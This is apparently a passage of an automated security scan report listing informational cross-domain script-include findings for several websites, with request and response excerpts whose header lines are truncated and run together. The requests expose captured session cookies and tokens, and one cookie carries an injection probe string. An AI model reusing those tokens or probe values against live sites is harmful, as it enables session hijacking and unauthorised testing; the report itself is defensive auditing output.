Information
Confidence:
Certain
Host:
http://t.tellapart.com
Path:
/hif
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==&tms=1316208686167 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7O1GhjWGagkBZ8cNX0k4oxPsv8LF9nJWKu12mbgkeBMt_o6CvAURFeGEBSF8UxpLeFjWV5Q2eOlAeV7yVQxxfhVQ6n7tXCCk-3AaAr-3DeDS9cBGOjMik-CONnHvyl4pD3SI4onQ1Vx5D2OKkZQcrsaYTa28GPXtJ-72-twAilquinwVbDX2VnkhBOx2C9B; __cmbGU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; AWSELB=E31F5987121C4E93C56CFAE300CB3FAA8458B8275ED54EFB1FBFC3259C68A4A477202DDBEDB9857088204A944F7B0E0B304C51662855C88DA4DD00256DCA9F810994CC9BEC
Response
HTTP/1.1 200 OKCPogQjfO0UMPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1qmAAsAAQAAAAI3NQoAAwAAATJzE1qmAAsAAQAAAAI3NAoAAwAAATJzE1qmAAsAAQAAAAMxMDUKAAMAAAEycxNapgAA; expires=Wed, 14-Mar-2012 16:30:40 GMT; Path=/; Domain=.tellapart.com...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.30. http://thehackernews.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://thehackernews.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://apis.google.com/js/plusone.js http://connect.facebook.net/en_US/all.js http://feeds.feedburner.com/TheHackersNews?format=sigpro http://platform.twitter.com/widgets.js http://s7.addthis.com/js/250/addthis_widget.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://tweetmeme.com/i/scripts/button.js http://widgetsplus.com/google_plus_widget.js http://www.blogger.com/static/v1/widgets/931580185-widgets.js http://xslt.alexa.com/site_stats/js/s/a?url=http://www.thehackernews.com https://apis.google.com/js/plusone.js
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-2456f7bca899"/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml' xmlns:b='http://www.google.com/2005/g...[SNIP]... <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'> </script>...[SNIP]... <script src='http://apis.google.com/js/plusone.js' type='text/javascript'> {lang: 'en-US'} </script>...[SNIP]... <script src='https://apis.google.com/js/plusone.js' type='text/javascript'> ...[SNIP]... <script src='http://platform.twitter.com/widgets.js' type='text/javascript'/> .facebook.net/en_US/all.js#appId=214086668642393&xfbml=1">...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'> </script>...[SNIP]... <script src='http://tweetmeme.com/i/scripts/button.js' type='text/javascript'> ...[SNIP]... <script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'> </script>...[SNIP]... <script src='http://tweetmeme.com/i/scripts/button.js' type='text/javascript'> ...[SNIP]... <script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'> </script>...[SNIP]... <script src='http://tweetmeme.com/i/scripts/button.js' type='text/javascript'> ...[SNIP]... <script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'> </script>...[SNIP]... <script src='http://tweetmeme.com/i/scripts/button.js' type='text/javascript'> ...[SNIP]... <script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'> </script>...[SNIP]... <script src='http://tweetmeme.com/i/scripts/button.js' type='text/javascript'> ...[SNIP]... <script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'> </script>...[SNIP]... <script src='http://tweetmeme.com/i/scripts/button.js' type='text/javascript'> ...[SNIP]... <script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'> </script>...[SNIP]... <script src='http://tweetmeme.com/i/scripts/button.js' type='text/javascript'> ...[SNIP]... <script src='http://widgetsplus.com/google_plus_widget.js' type='text/javascript'> </script>...[SNIP]... <script src='http://platform.twitter.com/widgets.js' type='text/javascript'> </script>...[SNIP]... <script src='http://s7.addthis.com/js/250/addthis_widget.js' type='text/javascript'> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://feeds.feedburner.com/TheHackersNews?format=sigpro" type="text/javascript" > </script>...[SNIP]... .com/siteinfo/http://www.thehackernews.com'><SCRIPT language='JavaScript' src='http://xslt.alexa.com/site_stats/js/s/a?url=http://www.thehackernews.com' type='text/javascript'> </SCRIPT>...[SNIP]... <script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/931580185-widgets.js"> </script>...[SNIP]...
16.31. http://thehackernews.com/2011/09/godaddy-websites-compromised-with.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://thehackernews.com
Path:
/2011/09/godaddy-websites-compromised-with.html
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://apis.google.com/js/plusone.js http://connect.facebook.net/en_US/all.js http://feeds.feedburner.com/TheHackersNews?format=sigpro http://platform.twitter.com/widgets.js http://s7.addthis.com/js/250/addthis_widget.js http://widgets.digg.com/buttons.js http://widgetsplus.com/google_plus_widget.js http://www.blogger.com/static/v1/widgets/931580185-widgets.js http://www.stumbleupon.com/hostedbadge.php?s=1 http://xslt.alexa.com/site_stats/js/s/a?url=http://www.thehackernews.com https://apis.google.com/js/plusone.js
Request
GET /2011/09/godaddy-websites-compromised-with.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1834991741.1316213726.1316213726.1316213726.1; __utmb=93595608.1.10.1316213726; __utmc=93595608; __utmz=93595608.1316213726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK-2456f7bca899"/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml' xmlns:b='http://www.google.com/2005/g...[SNIP]... <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'> </script>...[SNIP]... <script src='http://apis.google.com/js/plusone.js' type='text/javascript'> {lang: 'en-US'} </script>...[SNIP]... <script src='https://apis.google.com/js/plusone.js' type='text/javascript'> ...[SNIP]... <script src='http://platform.twitter.com/widgets.js' type='text/javascript'/> .facebook.net/en_US/all.js#appId=214086668642393&xfbml=1">...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src='http://widgets.digg.com/buttons.js' type='text/javascript'> </script>...[SNIP]... <script src='http://platform.twitter.com/widgets.js' type='text/javascript'> </script>...[SNIP]... <script src='http://www.stumbleupon.com/hostedbadge.php?s=1'> </script>...[SNIP]... <script src='http://feeds.feedburner.com/TheHackersNews?format=sigpro' type='text/javascript'> </script>...[SNIP]... <script src='http://widgetsplus.com/google_plus_widget.js' type='text/javascript'> </script>...[SNIP]... <script src='http://platform.twitter.com/widgets.js' type='text/javascript'> </script>...[SNIP]... <script src='http://s7.addthis.com/js/250/addthis_widget.js' type='text/javascript'> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... .com/siteinfo/http://www.thehackernews.com'><SCRIPT language='JavaScript' src='http://xslt.alexa.com/site_stats/js/s/a?url=http://www.thehackernews.com' type='text/javascript'> </SCRIPT>...[SNIP]... <script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/931580185-widgets.js"> </script>...[SNIP]...
16.32. http://ws.amazon.com/widgets/q
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ws.amazon.com
Path:
/widgets/q
Issue detail
The response dynamically includes the following script from another domain:http://wms.assoc-amazon.com/20070822/US/js/8002_7.js
Request
GET /widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733 HTTP/1.1;q=0.3.337409241.1315233673.1315233673.1315236916.2; __utmz=194891197.1315236916.2.2.utmccn=(referral)|utmcsr=aws-portal.amazon.com|utmcct=/gp/aws/html-forms-controller/contactus98dd2'%3bac3249871a9/aws-account-and-billing|utmcmd=referral; ct-main="?yScNOlWT31nv@QGPOP6MZlUTgEuPV67"; apn-user-id=ad436c0d-3f66-48df-8380-85023e358301; x-main="kYmMgX@s6zRSHrgXsrT2Jct5JsIxFj@7"; aws-ubid-main=189-0212498-8250436; aws-x-main=UsPqM6hqJEtppz2vUlxJzQS7UOORf9DA; session-token=SQF/NkehkGMk+jdlo6/NLXrRBtfG2aeSiUcxmLBxdBQ8cmJRMfNGlYkOX0a/N00l4OzAutqHvfb9FBh+fr8MF6/DdmBOr5uYhE9XOogb0pkADN6BRGFMatq2bldyvYdHA3jnepv+7Arl9xnJWdTft1/gFN5GixtGQVw8ONCdfFj7229gWrFCR/ylhyeHArd92XSZrR8ObUdlW6zcVvlI08NLUSNtliR/aHfv+MkySJE2G/JWqf7h9pFBH71guzzVfsd8zXeStVUwsLfl2A70Cg==; ubid-main=189-8322294-4852542; session-id-time=2082787201l; session-id=188-7348060-9795407
Response
HTTP/1.1 200 OK.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC ";charset=UTF-8:"opera-20","width":"615","inner_bkgd_color":"#FFFFFF","serviceVersion":"20070822","use_default_search_term":false,"...[SNIP]... <script charset="utf-8" type="text/javascript" src="http://wms.assoc-amazon.com/20070822/US/js/8002_7.js"> </script>...[SNIP]...
16.33. http://www.altn.com/Downloads/FreeEvaluation/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.altn.com
Path:
/Downloads/FreeEvaluation/
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /Downloads/FreeEvaluation/ HTTP/1.1/Downloads//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=1shsajjk30ypkr45a4knjdj4; CMSPreferredCulture=en-us; csauth=dXNlcklkPXtGQjE2RkNCQi01QUNDLTRBQzgtOTM1NS1DMzc5Qzg0N0VGRER9OmNhdGFsb2dJZD17MTExMTExMTEtMTExMS0xMTExLTExMTEtMTExMTExMTExMTExfTplbWFpbD06YXV0aFR5cGU9MDp1c2VyVHlwZT0w; __utma=1.338578957.1316207681.1316207681.1316207697.2; __utmb=1.4.10.1316207697; __utmc=1; __utmz=1.1316207697.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=xss
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/19...[SNIP]... <script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.34. http://www.altn.com/Products/MDaemon-Email-Server-Windows/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.altn.com
Path:
/Products/MDaemon-Email-Server-Windows/
Issue detail
The response dynamically includes the following script from another domain:http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=177&bc=226DB1&bgc=CFE8FC&fc=000000&fs=10&rc=False&rp=True&trc=False&shn=True&tb=False&pr=False
Request
GET /Products/MDaemon-Email-Server-Windows/?gclid=CNC9_rqUoqsCFeUZQgodLn8qig HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/19...[SNIP]... <script type="text/javascript" src="http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=177&bc=226DB1&bgc=CFE8FC&fc=000000&fs=10&rc=False&rp=True&trc=False&shn=True&tb=False&pr=False"> </script>...[SNIP]...
16.35. http://www.blackbaud.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.blackbaud.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://t5.trackalyzer.com/trackalyze.js http://w.sharethis.com/button/buttons.js
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK&UserPassword=&SupportSiteID=; expires=Mon, 16-Mar-2009 15:29:09 GMT; path=/&UserPassword=&SupportSiteID=; expires=Mon, 16-Mar-2009 15:29:09 GMT; path=/...[SNIP]... <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"> </script>...[SNIP]... <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"> </script>...[SNIP]...
16.36. http://www.bookkeepers.com.au/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.bookkeepers.com.au
Path:
/
Issue detail
The response dynamically includes the following script from another domain:http://pagead2.googlesyndication.com/pagead/show_ads.js
Request
GET / HTTP/1.1//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en-gb" lang="en-gb" >...[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"> ...[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"> ...[SNIP]...
16.37. http://www.drugstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/prototype.min.js?v=1.4.0 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/scriptaculous.js?v=1.5.2 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/edutl.js http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/shoprunner_init.js http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/web_analytics/s_code.js?v=0.1 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/scripts.asp?v=0.4 http://code.jquery.com/jquery-latest.js http://tracking.waterfrontmedia.com/GCScript.ashx http://www.googleadservices.com/pagead/conversion.js
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:e5fygw55j4x2lwjzim2cqdi4
Response
HTTP/1.1 200 OK:7B1B08A6C5BF4A968C79C9BFB007FDD0:ndla3vftgeechv555qu43rz2; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:30:25 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... <script src="http://code.jquery.com/jquery-latest.js"> ...[SNIP]... <script language="javascript" type="text/javascript" src="http://tracking.waterfrontmedia.com/GCScript.ashx"> </script>...[SNIP]... <script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/prototype.min.js?v=1.4.0"> </script><script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/scriptaculous.js?v=1.5.2"> </script><script src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/scripts.asp?v=0.4"> </script>...[SNIP]... <script language="JavaScript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/web_analytics/s_code.js?v=0.1"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]... <script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/shoprunner_init.js"> </script>...[SNIP]... <script src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/edutl.js"> </script>...[SNIP]...
16.38. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/pharmacy/drugindex/rxsearch.asp
Issue detail
The response dynamically includes the following scripts from other domains:http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/prototype.min.js?v=1.4.0 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/scriptaculous.js?v=1.5.2 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/edutl.js http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/shoprunner_init.js http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/web_analytics/s_code.js?v=0.1 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/scripts.asp?v=0.4
Request
GET /pharmacy/drugindex/rxsearch.asp?search=ess HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:ssmstg55acliez55gebilj55; ASP.NET_SessionId=tujq4xeiqb4bta55tp0jzqna; drugstore%2Efish=UserID=57ABB42C1945443F8A38894F54FEB227; ABTests=07082011_tns_abtest=abtest_not_qualified@&20051228_entrypages=1@09/16/2011 9:30:24 AM&091211_GWP_YTC=1@09/16/2011 9:30:24 AM&040610_bizrate_beauty=1@09/16/2011 9:30:24 AM&030411_click2chat_dscm=1@09/16/2011 9:30:24 AM&110210_bizrate_VD=abtest_not_qualified@&20090319_ForeSee_Vision=abtest_not_qualified@&pdetails_ver2=1@09/16/2011 9:30:24 AM&20060410_bizrate=0@09/16/2011 9:30:24 AM&20070530_GoogleCheckout=1@09/16/2011 9:30:24 AM&aggregate_knowledge=1@09/16/2011 9:30:24 AM&ship_interrupt=2@09/16/2011 9:30:24 AM&05262011_ivd_ciba_25percent_off=abtest_not_qualified@; BIGipServerdscm_farm=2316609728.0.0000; s_sess=%20s_cc%3Dtrue%3B%20abtest%3DABTEST_20060410_bizrate%257C0%3B%20s_sq%3Ddrugstorecomglobalprod%253D%252526pid%25253Dotc%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_search.gif%252526ot%25253DIMAGE%3B; s_vi=[CS]v1|2739BCD58514B3D4-4000018C2004D12D[CE]; _br_uid_1=uid%3D5299788113416%3A; __cmbDomTm=0; __cmbU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; __cmbTpvTm=1058
Response
HTTP/1.1 200 OK:7B1B08A6C5BF4A968C79C9BFB007FDD0:yonvhm55shpcsh45w02oevnl; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:39 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... <script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/prototype.min.js?v=1.4.0"> </script><script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/scriptaculous.js?v=1.5.2"> </script><script src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/scripts.asp?v=0.4"> </script>...[SNIP]... <script language="JavaScript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/web_analytics/s_code.js?v=0.1"> </script>...[SNIP]... <script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/shoprunner_init.js"> </script>...[SNIP]... <script src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/edutl.js"> </script>...[SNIP]...
16.39. http://www.facebook.com/connect/connect.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/connect/connect.php
Issue detail
The response dynamically includes the following scripts from other domains:http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js
Request
GET /connect/connect.php?id=40433056905&connections=10&stream=1&css=http://www.port25.com/includes/port25.css HTTP/1.1/products/prod_evalthanks.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
Response
HTTP/1.1 200 OK=false;</script><title>Connect</title>...[SNIP]... .fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css" /><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"> </script>...[SNIP]...
16.40. http://www.facebook.com/plugins/likebox.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/plugins/likebox.php
Issue detail
The response dynamically includes the following scripts from other domains:http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js
Request
GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fblackbaud&width=250&colorscheme=light&show_faces=true&stream=false&header=false&height=258 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
Response
HTTP/1.1 200 OK=false;</script><title>Likebox</title>...[SNIP]... .fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css" /><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"> </script>...[SNIP]...
16.41. http://www.godaddy.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.5.1.min.js http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2 http://img3.wsimg.com/fos/script/ProductAdvisor5.min.js http://img3.wsimg.com/fos/script/QuickBuyInsert9.min.js http://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js http://img3.wsimg.com/fos/script/atlantis_jquery8.min.js http://img3.wsimg.com/fos/script/atlantis_jquery9.min.js http://img3.wsimg.com/fos/script/jquery.tablesorter.min.js http://img3.wsimg.com/fos/script/sales16.min.js http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
GET / HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; flag1=cflag=us
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:05:33 GMT; path=/mageTwo; path=/&referrer=http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... :0;"><script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.5.1.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <script src="http://img3.wsimg.com/fos/script/ProductAdvisor5.min.js" type="text/javascript"> </script>...[SNIP]... <script src="http://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/jquery.tablesorter.min.js" type="text/javascript"> </script>...[SNIP]... <script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/atlantis_jquery9.min.js" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"> </script>...[SNIP]... <script src="http://img3.wsimg.com/fos/script/QuickBuyInsert9.min.js" type="text/javascript"> </script>...[SNIP]...
16.42. http://www.godaddy.com/domains/search.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/domains/search.aspx
Issue detail
The response dynamically includes the following scripts from other domains:http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2 http://img3.wsimg.com/fos/script/atlantis_jquery8.js http://img3.wsimg.com/fos/script/sales16.min.js http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
GET /domains/search.aspx HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95
Response
